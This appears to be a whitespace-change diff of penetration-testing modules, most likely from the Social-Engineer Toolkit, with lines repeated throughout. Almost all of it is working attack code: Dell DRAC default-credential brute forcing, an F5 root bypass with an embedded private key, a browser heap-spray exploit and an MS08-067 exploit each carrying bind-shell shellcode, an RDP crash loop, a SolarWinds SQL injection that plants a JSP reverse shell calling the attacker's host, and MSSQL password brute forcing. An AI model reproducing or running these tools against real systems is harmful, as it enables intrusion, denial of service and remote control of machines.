database = setcore.meta_database()
range = raw_input(setcore.setprompt(["19","20"], "Enter the IP ranges to attack (nmap syntax only)"))
print 'Doing do_autopwn'
# pull the metasploit database
database = setcore.meta_database()
range = raw_input(setcore.setprompt(["19","20"], "Enter the IP ranges to attack (nmap syntax only)"))
# prep the answer file
prep(database, range)
confirm_attack = raw_input(setcore.setprompt(["19","20"], "You are about to attack systems are you sure [y/n]"))
# prep the answer file
prep(database, range)
confirm_attack = raw_input(setcore.setprompt(["19","20"], "You are about to attack systems are you sure [y/n]"))
# if we are sure, then lets do it
if confirm_attack == "yes" or confirm_attack == "y":
launch()
# if we are sure, then lets do it
if confirm_attack == "yes" or confirm_attack == "y":
launch()


@ -2,7 +2,7 @@
###########################################
#
# Dell DRAC and Chassis Scanner
# Dell DRAC and Chassis Scanner
# Default Credential Check
# UN: root PW: calvin
#
@ -20,44 +20,44 @@ import sys
import time
class bcolors:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERL = '\033[4m'
ENDC = '\033[0m'
backBlack = '\033[40m'
backRed = '\033[41m'
backGreen = '\033[42m'
backYellow = '\033[43m'
backBlue = '\033[44m'
backMagenta = '\033[45m'
backCyan = '\033[46m'
backWhite = '\033[47m'
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERL = '\033[4m'
ENDC = '\033[0m'
backBlack = '\033[40m'
backRed = '\033[41m'
backGreen = '\033[42m'
backYellow = '\033[43m'
backBlue = '\033[44m'
backMagenta = '\033[45m'
backCyan = '\033[46m'
backWhite = '\033[47m'
def disable(self):
self.PURPLE = ''
self.CYAN = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.RED = ''
self.ENDC = ''
self.BOLD = ''
self.UNDERL = ''
self.backBlack = ''
self.backRed = ''
self.backGreen = ''
self.backYellow = ''
self.backBlue = ''
self.backMagenta = ''
self.backCyan = ''
self.backWhite = ''
self.DARKCYAN = ''
def disable(self):
self.PURPLE = ''
self.CYAN = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.RED = ''
self.ENDC = ''
self.BOLD = ''
self.UNDERL = ''
self.backBlack = ''
self.backRed = ''
self.backGreen = ''
self.backYellow = ''
self.backBlue = ''
self.backMagenta = ''
self.backCyan = ''
self.backWhite = ''
self.DARKCYAN = ''
print "\n"
print "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
@ -84,102 +84,102 @@ ipaddr = raw_input("Enter the IP or CIDR: ")
# try logging into DRAC, chassis is something different
def login_drac(ipaddr_single):
# default post string
url = "https://%s/Applications/dellUI/RPC/WEBSES/create.asp" % (ipaddr_single)
# post parameters
opts = {
"WEBVAR_PASSWORD": "calvin",
"WEBVAR_USERNAME": "root",
"WEBVAR_ISCMCLOGIN": 0
}
# URL encode it
data = urllib.urlencode(opts)
# our headers to pass (taken from raw post)
headers = {
# "Host": "10.245.196.52",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://%s/Applications/dellUI/login.htm" % (ipaddr_single),
"Content-Length": 63,
"Cookie": "test=1; SessionLang=EN",
"Pragma": "no-cache",
"Cache-Control": "no-cache"
# default post string
url = "https://%s/Applications/dellUI/RPC/WEBSES/create.asp" % (ipaddr_single)
# post parameters
opts = {
"WEBVAR_PASSWORD": "calvin",
"WEBVAR_USERNAME": "root",
"WEBVAR_ISCMCLOGIN": 0
}
# URL encode it
data = urllib.urlencode(opts)
# our headers to pass (taken from raw post)
headers = {
# "Host": "10.245.196.52",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://%s/Applications/dellUI/login.htm" % (ipaddr_single),
"Content-Length": 63,
"Cookie": "test=1; SessionLang=EN",
"Pragma": "no-cache",
"Cache-Control": "no-cache"
}
# request the page
req = urllib2.Request(url, data, headers)
try:
# capture the response
response = urllib2.urlopen(req, timeout=2)
data = response.read()
# if we failed our login, just pass through
if "Failure_Login_IPMI_Then_LDAP" in data:
pass
# Failure_No_Free_Slot means there are no sessions available need to log someone off
if "Failure_No_Free_Slot" in data:
print (bcolors.YELLOW + "[!]" + bcolors.ENDC + " There are to many people logged but un: root and pw: calvin are legit on IP: " % (ipaddr_single))
global global_check1
global_check1 = 1
# if we are presented with a username back, we are golden
if "'USERNAME' : 'root'" in data:
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " Dell DRAC compromised! username: root and password: calvin for IP address: " + ipaddr_single)
global global_check2
global_check2 = 1
# handle failed attempts and move on
except: pass
}
# request the page
req = urllib2.Request(url, data, headers)
try:
# capture the response
response = urllib2.urlopen(req, timeout=2)
data = response.read()
# if we failed our login, just pass through
if "Failure_Login_IPMI_Then_LDAP" in data:
pass
# Failure_No_Free_Slot means there are no sessions available need to log someone off
if "Failure_No_Free_Slot" in data:
print (bcolors.YELLOW + "[!]" + bcolors.ENDC + " There are to many people logged but un: root and pw: calvin are legit on IP: " % (ipaddr_single))
global global_check1
global_check1 = 1
# if we are presented with a username back, we are golden
if "'USERNAME' : 'root'" in data:
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " Dell DRAC compromised! username: root and password: calvin for IP address: " + ipaddr_single)
global global_check2
global_check2 = 1
# handle failed attempts and move on
except: pass
# these are for the centralized dell chassis
def login_chassis(ipaddr_single):
# our post URL
url = "https://%s/cgi-bin/webcgi/login" % (ipaddr_single)
# our post parameters
opts = {
"WEBSERVER_timeout": "1800",
"user": "root",
"password": "calvin",
"WEBSERVER_timeout_select": "1800"
}
# url encode
data = urllib.urlencode(opts)
# headers (taken from raw POST)
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://%s/cgi-bin/webcgi/login" % (ipaddr_single),
"Content-Length": 78
}
# request the page
req = urllib2.Request(url, data, headers)
try:
# capture the response
response = urllib2.urlopen(req, timeout=2)
data = response.read()
# if we failed to login
if "login_failed_hr_top" in data:
pass # login failed
# to many people logged in at a given time
if 'Connection refused, maximum sessions already in use.' in data:
print (bcolors.YELLOW + "[!]" + bcolors.ENDC + " There are to many people logged but un: root and pw: calvin are legit on IP: " + (ipaddr_single))
global global_check3
global_check3 = 1
# our post URL
url = "https://%s/cgi-bin/webcgi/login" % (ipaddr_single)
# our post parameters
opts = {
"WEBSERVER_timeout": "1800",
"user": "root",
"password": "calvin",
"WEBSERVER_timeout_select": "1800"
}
# url encode
data = urllib.urlencode(opts)
# headers (taken from raw POST)
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://%s/cgi-bin/webcgi/login" % (ipaddr_single),
"Content-Length": 78
}
# request the page
req = urllib2.Request(url, data, headers)
try:
# capture the response
response = urllib2.urlopen(req, timeout=2)
data = response.read()
# if we failed to login
if "login_failed_hr_top" in data:
pass # login failed
# to many people logged in at a given time
if 'Connection refused, maximum sessions already in use.' in data:
print (bcolors.YELLOW + "[!]" + bcolors.ENDC + " There are to many people logged but un: root and pw: calvin are legit on IP: " + (ipaddr_single))
global global_check3
global_check3 = 1
# successful guess of passwords
if "/cgi-bin/webcgi/index" in data:
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " Dell Chassis Compromised! username: root password: calvin for IP address: " + ipaddr_single)
global global_check4
global_check4 = 1
# successful guess of passwords
if "/cgi-bin/webcgi/index" in data:
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " Dell Chassis Compromised! username: root password: calvin for IP address: " + ipaddr_single)
global global_check4
global_check4 = 1
# except and move on for failed login attempts
except: pass
# except and move on for failed login attempts
except: pass
# this will check to see if we are using
# a valid IP address for scanning
@ -258,50 +258,50 @@ def bin2ip(b):
# print a list of IP addresses based on the CIDR block specified
def scan(ipaddr):
if "/" in ipaddr:
parts = ipaddr.split("/")
baseIP = ip2bin(parts[0])
subnet = int(parts[1])
if subnet == 32:
ipaddr = bin2ip(baseIP)
else:
# our base ip addresses for how many we are going to be scanning
counter = 0
# capture the threads
threads = []
ipPrefix = baseIP[:-(32-subnet)]
for i in range(2**(32-subnet)):
ipaddr_single = bin2ip(ipPrefix+dec2bin(i, (32-subnet)))
# if we are valid proceed
ip_check = is_valid_ip(ipaddr_single)
if ip_check != False:
# do this to limit how fast it can scan, anything more causes CPU to hose
if counter > 255:
# put a small delay in place
time.sleep(0.1)
# increase counter until 255 then delay 0.1
counter = counter + 1
# start our drac BF
thread = threading.Thread(target=login_drac, args=(ipaddr_single,))
# create a list of our threads in a dictionary
threads.append(thread)
# start the thread
thread.start()
# same as above just on the chassis
thread = threading.Thread(target=login_chassis, args=(ipaddr_single,))
# append the thread
threads.append(thread)
# start the thread
thread.start()
if "/" in ipaddr:
parts = ipaddr.split("/")
baseIP = ip2bin(parts[0])
subnet = int(parts[1])
if subnet == 32:
ipaddr = bin2ip(baseIP)
else:
# our base ip addresses for how many we are going to be scanning
counter = 0
# capture the threads
threads = []
ipPrefix = baseIP[:-(32-subnet)]
for i in range(2**(32-subnet)):
ipaddr_single = bin2ip(ipPrefix+dec2bin(i, (32-subnet)))
# if we are valid proceed
ip_check = is_valid_ip(ipaddr_single)
if ip_check != False:
# do this to limit how fast it can scan, anything more causes CPU to hose
if counter > 255:
# put a small delay in place
time.sleep(0.1)
# increase counter until 255 then delay 0.1
counter = counter + 1
# start our drac BF
thread = threading.Thread(target=login_drac, args=(ipaddr_single,))
# create a list of our threads in a dictionary
threads.append(thread)
# start the thread
thread.start()
# same as above just on the chassis
thread = threading.Thread(target=login_chassis, args=(ipaddr_single,))
# append the thread
threads.append(thread)
# start the thread
thread.start()
# wait for all the threads to terminate
for thread in threads:
thread.join()
# wait for all the threads to terminate
for thread in threads:
thread.join()
# if we are using a single IP address then just do this
if not "/" in ipaddr:
login_drac(ipaddr)
login_chassis(ipaddr)
# if we are using a single IP address then just do this
if not "/" in ipaddr:
login_drac(ipaddr)
login_chassis(ipaddr)
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " Scanning IP addresses, this could take a few minutes depending on how large the subnet range...")
@ -316,9 +316,9 @@ global_check4 = 0
# kick off the scan
scan(ipaddr)
if global_check1 or global_check2 or global_check3 or global_check4 == 1:
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " DellDrac / Chassis Brute Forcer has finished scanning. Happy Hunting =)")
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " DellDrac / Chassis Brute Forcer has finished scanning. Happy Hunting =)")
else:
print (bcolors.RED + "[!]" + bcolors.ENDC + " Sorry, unable to find any of the Dell servers with default creds..Good luck :(")
print (bcolors.RED + "[!]" + bcolors.ENDC + " Sorry, unable to find any of the Dell servers with default creds..Good luck :(")
raw_input("Press {return} to exit.")


@ -7,7 +7,7 @@
#
#
import subprocess,os
filewrite = file("priv.key", "w")
filewrite.write("""-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
@ -31,10 +31,9 @@ Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
http://www.secmaniac.com
"""
"""
ipaddr=raw_input("Enter the IP address of the F5: ")
subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait()
if os.path.isfile("priv.key"):
os.remove("priv.key")


@ -15,7 +15,7 @@ class myRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
# Always Accept GET
self.printCustomHTTPResponse(200)
if self.path == "/":
target=self.client_address[0]
self.wfile.write("""
@ -28,7 +28,7 @@ class myRequestHandler(BaseHTTPRequestHandler):
- Win 7 fun version by mr_me</p>
<!--
Notes:
- This exploit requires <= java 6 update 25.
- optimized heap spray and still works on mutiple tabs as
the spray is large enough to hit the 0x10000000 block.
@ -37,17 +37,17 @@ Notes:
but java still loads without it.
- Tested on windows 7 ultimate (latest updates).
- http://bit.ly/qD4Jkc
-->
<object id="d"><object>
<script type="text/javascript">
function trigger(){
alert('ready?');
fakeobject = document.getElementById("d"); // allocate the object
fakeobject.QueryInterface(Components.interfaces.nsIChannelEventSink); // append to the objects available functions
fakeobject.onChannelRedirect(null,new Object,0); // free it
/*
fill the object with a fake vtable reference
just use the start of a block for simplicity and use \x00
@ -55,14 +55,14 @@ function trigger(){
when we have have the CALL DWORD PTR DS:[ECX+18], it will point to 0x10000000
*/
fakevtable = unescape("\x00%u1000");
var rop = "";
// 3 instructions to pivot cleanly
rop += unescape("%u1033%u6d7f"); // 0x6D7F1033 -> MOV EAX,[ECX] / PUSH EDI / CALL [EAX+4] <jvm.dll>
rop += unescape("%u10a7%u6d7f"); // 0x6D7F10A7 -> POP EBP / RETN <jvm.dll>
rop += unescape("%u1441%u6d7f"); // 0x6D7F1441 -> XCHG EAX,ESP / RETN <jvm.dll>
// generic rop taken from MSVCR71.dll (thanks to corelanc0d3r)
rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
rop += unescape("%ua140%u7c37"); // 0x7c37a140 -> Make EAX readable
@ -95,16 +95,16 @@ function trigger(){
rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
rop += unescape("%u9090%u9090"); // 0x90909090 -> NOPS (-> eax)
rop += unescape("%u8c81%u7c37"); // 0x7c378c81 -> PUSHAD / ADD AL,0EF / RETN
sc = rop;
sc = rop;
// metasploit bind shell port 4444
sc += unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650%u5656%u5646%u564e%u5356%u6856%ucc79%u863f%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u41d5");
// create a string with a ptr to the offset of our rop
// used 0x1000001c to accomidate 0x18 + 0x4 (1st rop gadget)
var filler = unescape("%u001c%u1000");
while(filler.length < 0x100) {filler += filler;}
/*
create a string with 0x18 bytes at the start containing ptr's to the rop.
This is to account for the vtable offset (0x18) -> 'CALL DWORD PTR DS:[ECX+18]'
@ -113,13 +113,13 @@ function trigger(){
var chunk = filler.substring(0,0x18/2);
chunk += sc;
chunk += filler;
// create a string of size 64k in memory that contains sc + filler
var heapblock = chunk.substring(0,0x10000/2);
// keep adding more memory that contains sc + filler to reach 512kB
while (heapblock.length<0x80000) {heapblock += heapblock;}
/*
using a final string of 512kB so that the spray is fast but ensuring accuracy
- sub the block header length (0x24)
@ -128,7 +128,7 @@ function trigger(){
- sub the null byte terminator
*/
var finalspray = heapblock.substring(0,0x80000 - sc.length - 0x24/2 - 0x4/2 - 0x2/2);
// optimised spray, precision can still be reliable even with tabs.
// force allocation here of 128 blocks, using only 64MB of memory, speeeeeeed.
arrayOfHeapBlocks = new Array()
@ -145,9 +145,9 @@ trigger();
self.wfile.write("""<title>Please wait...</title></head><body>""")
self.wfile.write("""<left><body bgcolor="Black"><font color="White">
Please wait<br>""")
print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-] Connect to IP Address: %s and port 4444 [-]" % (target))
# Print custom HTTP Response
def printCustomHTTPResponse(self, respcode):
self.send_response(respcode)
@ -175,10 +175,7 @@ try:
# handle the connections
httpd.handle_request()
# Serve HTTP server forever
httpd.serve_forever()
httpd.serve_forever()
# Except Keyboard Interrupts and throw custom message
except KeyboardInterrupt:
print ("\n\n Exiting exploit...\n\n")


@ -9,10 +9,10 @@
from src.core.setcore import *
import struct
import sys
import time
import time
from threading import Thread #Thread is imported incase you would like to modify
#the src to run against multiple targets.
try:
from impacket import smb
from impacket import uuid
@ -23,16 +23,16 @@ except ImportError, _:
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
sys.exit(1)
print '#######################################################################'
print '# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)'
print '# www.hackingspirits.com'
print '# www.coffeeandsecurity.com'
print '# Email: d3basis.m0hanty @ gmail.com'
print '#######################################################################\n'
#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
@ -57,8 +57,8 @@ shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
#Payload for Windows 2000 target
payload_1='\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
@ -72,7 +72,7 @@ payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\xeb\xcc'
payload_1+='\x00\x00'
#Payload for Windows 2003[SP2] target
payload_2='\x41\x00\x5c\x00'
payload_2+='\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
@ -90,23 +90,23 @@ payload_2+='\xba\x77\xf9\x75\xbd\x77\x00\x00'
target = raw_input("Enter the IP address you want to attack: ")
print "Select target:\n\n 1. Windows 2000\n 2. Windows 2003 SP2\n"
osver = raw_input("Enter the target operating system number: ")
if osver == "1":
osver = payload_1
print '[-]Windows 2000 payload loaded'
osver = payload_1
print '[-]Windows 2000 payload loaded'
if osver == "2":
osver=payload_2
print '[-]Windows 2003[SP2] payload loaded'
osver=payload_2
print '[-]Windows 2003[SP2] payload loaded'
class SRVSVC_Exploit(Thread):
def __init__(self, target, osver, port=445):
super(SRVSVC_Exploit, self).__init__()
self.__port = port
self.target = target
self.osver = osver
def __DCEPacket(self):
print '[-]Initiating connection'
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
@ -114,7 +114,7 @@ class SRVSVC_Exploit(Thread):
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
self.__dce = self.__trans.DCERPC_class(self.__trans)
self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
# Constructing Malicious Packet
self.__stub='\x01\x00\x00\x00'
self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
@ -136,19 +136,18 @@ class SRVSVC_Exploit(Thread):
self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
self.__stub+='\x01\x00\x00\x00'
return
def run(self):
try:
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub) #0x1f (or 31)- NetPathCanonicalize Operation
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub) #0x1f (or 31)- NetPathCanonicalize Operation
except:
print '[-] System appears not to be vulnerable. Sorry.'
print '[-] System appears not to be vulnerable. Sorry.'
try:
current = SRVSVC_Exploit(target, osver)
current.start()
current = SRVSVC_Exploit(target, osver)
current.start()
except:
print '[-] Target does not appear vulnerable.'
print '[-] Target does not appear vulnerable.'
print "[!] If no errors were thrown. Try connecting to victim on 4444"


@ -21,9 +21,8 @@ Original advisory here: seclists.org/oss-sec/2012/q2/493
Note, you will see a number of failed login attempts, after about 300, if it doesn't
work, then its not vulnerable.
"""
"""
ipaddr = raw_input("Enter the IP address of the mysql server: ")
while 1:
subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()


@ -26,8 +26,8 @@ trololo = headpack+dafuq+dafree
HOSTNYO = raw_input("Enter the IP address to crash (remote desktop): ")
PORTNYO = 3389
for i in range(10240):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOSTNYO,PORTNYO))
s.send(trololo)
rec = s.recv(1024)
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOSTNYO,PORTNYO))
s.send(trololo)
rec = s.recv(1024)
s.close()


@ -9,25 +9,25 @@
######################################################################################
# Discovered by Digital Defence - DDIVRT-2011-39
######################################################################################
import urllib, urllib2, cookielib
import sys
import random
print "\n[*] Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit"
print "[*] Vulnerability discovered by Digital Defence - DDIVRT-2011-39"
print "[*] Offensive Security - http://www.offensive-security.com\n"
#if (len(sys.argv) != 4):
# print "[*] Usage: solarshell.py <RHOST> <LHOST> <LPORT>"
# exit(0)
#rhost = sys.argv[1]
#lhost = sys.argv[2]
#lport = sys.argv[3]
rhost = raw_input("Enter the remote host IP address: ")
lhost = raw_input("Enter the attacker IP address: ")
lport = raw_input("Enter the local port: ")
@ -36,26 +36,26 @@ filename = ''
for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',6):
filename+=i
filename +=".jsp"
output_path= "c:/Program Files/SolarWinds/Storage Manager Server/webapps/ROOT/%s" %filename
jsp = '''<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector( InputStream is, OutputStream os )
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader in = null;
@ -81,7 +81,7 @@ try
} catch( Exception e ){}
}
}
try
{
Socket socket = new Socket( "''' + lhost +'''", '''+lport+''');
@ -90,17 +90,17 @@ try
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>'''
jsp = jsp.replace("\n","")
jsp = jsp.replace("\t","")
prepayload = "AAA' "
prepayload += 'union select 0x%s,2,3,4,5,6,7,8,9,10,11,12,13,14 into outfile "%s"' % (jsp.encode('hex'),output_path)
prepayload += "#"
postpayload = "1' or 1=1#--"
loginstate='checkLogin'
password = 'OHAI'
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
post_params = urllib.urlencode({'loginState' : loginstate, 'loginName' : prepayload,'password' : password})
@ -111,7 +111,6 @@ post_params = urllib.urlencode({'loginState' : loginstate, 'loginName' : postpay
resp = opener.open("http://%s:9000/LoginServlet" % rhost, post_params)
resp = opener.open("http://%s:9000/%s" % (rhost,filename))
print "[*] Check your shell on %s %s\n" % (lhost,lport)
# 01010011 01101100 01100101 01100101 01110000 01101001 01110011 01101111
# 01110110 01100101 01110010 01110010 01100001 01110100 01100101 01100100


@ -22,265 +22,265 @@ operating_system = setcore.check_os()
# this is for the initial discovery for scanning
def scan(range,lowport,highport):
# scan the ranges
from src.core import portscan
portscan=portscan.launch(range, lowport, highport)
# if we returned values
if portscan != False:
return portscan
# if nothing is returned
if portscan == False:
setcore.print_warning("No MSSQL servers were found in the ranges specified")
return False
# return the portscan value
# scan the ranges
from src.core import portscan
portscan=portscan.launch(range, lowport, highport)
# if we returned values
if portscan != False:
return portscan
# if nothing is returned
if portscan == False:
setcore.print_warning("No MSSQL servers were found in the ranges specified")
return False
# return the portscan value
return portscan
#
# this is the brute forcer
#
def brute(ipaddr,username,port,wordlist):
# if ipaddr being passed is invalid
if ipaddr == "":
return False
if ipaddr != "":
# base counter for successful brute force
counter = 0
# build in quick wordlist
if wordlist == "default":
wordlist = "src/fasttrack/wordlist.txt"
# if ipaddr being passed is invalid
if ipaddr == "":
return False
if ipaddr != "":
# base counter for successful brute force
counter = 0
# build in quick wordlist
if wordlist == "default":
wordlist = "src/fasttrack/wordlist.txt"
# read in the file
password = file(wordlist, "r")
for passwords in password:
passwords = passwords.rstrip()
# try actual password
try:
print "Attempting to brute force " + setcore.bcolors.BOLD + ipaddr + setcore.bcolors.ENDC + " with username of " + setcore.bcolors.BOLD + username + setcore.bcolors.ENDC + " and password of " + setcore.bcolors.BOLD + passwords + setcore.bcolors.ENDC
# connect to the sql server and attempt a password
target_server = _mssql.connect(ipaddr + ":" + str(port), username, passwords)
# print that we were successful
setcore.print_status("\nSuccessful login with username %s and password: %s" % (username, passwords))
counter = 1
break
# read in the file
password = file(wordlist, "r")
for passwords in password:
passwords = passwords.rstrip()
# try actual password
try:
print "Attempting to brute force " + setcore.bcolors.BOLD + ipaddr + setcore.bcolors.ENDC + " with username of " + setcore.bcolors.BOLD + username + setcore.bcolors.ENDC + " and password of " + setcore.bcolors.BOLD + passwords + setcore.bcolors.ENDC
# connect to the sql server and attempt a password
target_server = _mssql.connect(ipaddr + ":" + str(port), username, passwords)
# print that we were successful
setcore.print_status("\nSuccessful login with username %s and password: %s" % (username, passwords))
counter = 1
break
# if invalid password
except Exception, e:
pass
# if invalid password
except Exception, e:
pass
# if we brute forced a machine
if counter == 1:
return ipaddr + "," + username + "," + str(port) + "," + passwords
# else we didnt and we need to return a false
else:
if ipaddr != '':
setcore.print_warning("Unable to guess the SQL password for %s with username of %s" % (ipaddr,username))
return False
# if we brute forced a machine
if counter == 1:
return ipaddr + "," + username + "," + str(port) + "," + passwords
# else we didnt and we need to return a false
else:
if ipaddr != '':
setcore.print_warning("Unable to guess the SQL password for %s with username of %s" % (ipaddr,username))
return False
#
# this will deploy an already prestaged executable that reads in hexadecimal and back to binary
#
def deploy_hex2binary(ipaddr,port,username,password,option):
# connect to SQL server
target_server = _mssql.connect(ipaddr + ":" + str(port), username, password)
setcore.print_status("Connection established with SQL Server...")
setcore.print_status("Converting payload to hexadecimal...")
# if we are using a SET interactive shell payload then we need to make the path under web_clone versus program_junk
if os.path.isfile("src/program_junk/set.payload"):
web_path = ("src/program_junk/web_clone/")
# then we are using metasploit
if not os.path.isfile("src/program_junk/set.payload"):
if operating_system == "posix":
web_path = ("src/program_junk")
subprocess.Popen("cp src/program_junk/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait()
subprocess.Popen("cp src/program_junk/msf2.exe src/program_junk/msf.exe 1> /dev/null 2> /dev/null", shell=True).wait()
fileopen = file("%s/msf.exe" % (web_path), "rb")
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
filewrite = file("src/program_junk/payload.hex", "w")
filewrite.write(data)
filewrite.close()
# connect to SQL server
target_server = _mssql.connect(ipaddr + ":" + str(port), username, password)
setcore.print_status("Connection established with SQL Server...")
setcore.print_status("Converting payload to hexadecimal...")
# if we are using a SET interactive shell payload then we need to make the path under web_clone versus program_junk
if os.path.isfile("src/program_junk/set.payload"):
web_path = ("src/program_junk/web_clone/")
# then we are using metasploit
if not os.path.isfile("src/program_junk/set.payload"):
if operating_system == "posix":
web_path = ("src/program_junk")
subprocess.Popen("cp src/program_junk/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait()
